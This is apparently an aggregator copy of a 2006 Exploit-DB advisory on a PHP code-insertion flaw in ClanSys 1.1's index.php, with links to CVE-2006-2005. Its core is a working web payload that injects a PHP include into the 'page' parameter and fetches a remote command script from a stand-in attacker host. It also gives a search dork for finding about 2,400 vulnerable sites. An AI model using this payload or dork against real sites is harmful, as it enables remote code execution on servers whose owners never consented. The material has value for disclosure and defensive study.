Lucene search
NukedxEDB-ID:1710HistoryApr 23, 2006 - 12:00 a.m.
Clansys 1.1 - 'index.php' PHP Code Insertion
2006-04-2300:00:00
nukedx
www.exploit-db.com
29
AI Score
7.4
Confidence
Low
NukedX Security Advisory Nr 2006-29
ClanSys v1.1 (index.php page) PHP Code Insertion Vulnerability
Method found & Exploit scripted by nukedx
Contacts > ICQ: 10072 MSN/Main: [email protected] web: www.nukedx.com
Original advisory: http://www.nukedx.com/?viewdoc=29
Dork: "ClanSys v.1.1" 2.400 pages.
Full PoC ->
GET -> http://[victim]/[ClanSysPath]/index.php?page=[PHPCode]
EXAMPLE -> http://[victim]/[ClanSysPath]/index.php?page=<?include($s);?>&s=http://yourhost.com/cmd.txt?
# nukedx.com [2006-04-23]
# milw0rm.com [2006-04-23]Related
cvelist
cvelist
CVE-2006-2005
2006-04-25 10:00:00
cve
cve
CVE-2006-2005
2006-04-25 12:50:00
prion
prion
Sql injection
2006-04-25 12:50:00
nvd
nvd
CVE-2006-2005
2006-04-25 12:50:00